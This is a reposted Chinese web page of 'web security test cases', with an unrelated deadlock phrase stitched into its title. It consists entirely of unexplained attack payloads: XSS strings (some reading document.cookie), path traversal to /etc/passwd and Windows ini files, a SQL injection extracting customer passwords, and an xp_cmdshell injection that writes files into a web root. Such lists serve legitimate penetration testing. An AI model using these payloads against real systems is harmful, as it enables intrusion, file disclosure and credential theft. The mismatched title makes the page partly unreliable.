多线程如何避免死锁 web安全性测试用例(10)

%22%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e

%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini

%3c/a%3e%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e

%3c/title%3e%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e

%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e/index.html

%3f.jsp

%3f.jsp

<scrīpt>alert(‘Vulnerable‘);</scrīpt&gt

<scrīpt>alert(‘Vulnerable‘)</scrīpt>

?sql_debug=1

a%5c.aspx

a.jsp/<scrīpt>alert(‘Vulnerable‘)</scrīpt>

a/

a?<scrīpt>alert(‘Vulnerable‘)</scrīpt>

"><scrīpt>alert(‘Vulnerable‘)</scrīpt>

‘;exec%20master..xp_cmdshell%20‘dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt‘--&&

%22%3E%3Cscrīpt%3Ealert(document.cookie)%3C/scrīpt%3E

%3Cscrīpt%3Ealert(document. domain);%3C/scrīpt%3E&

%3Cscrīpt%3Ealert(document.domain);%3C/scrīpt%3E&SESSION_ID={SESSION_ID}&SESSION_ID=

1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=

../../../../../../../../etc/passwd

..\..\..\..\..\..\..\..\windows\system.ini

\..\..\..\..\..\..\..\..\windows\system.ini

‘‘;!--"<XSS>=&{()}

<IMG SRC="javascrīpt:alert(‘XSS‘);">

<IMG SRC=javascrīpt:alert(‘XSS‘)>

<IMG SRC=javascrīpt:alert(‘XSS‘)>

<IMG SRC=javascrīpt:alert(&quot;XSS&quot;)>

<IMG SRC=javascrīpt:alert(‘XSS‘)>

<IMG SRC=javascrīpt:alert(‘XSS‘)>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/jisuanjixue/article-67715-10.html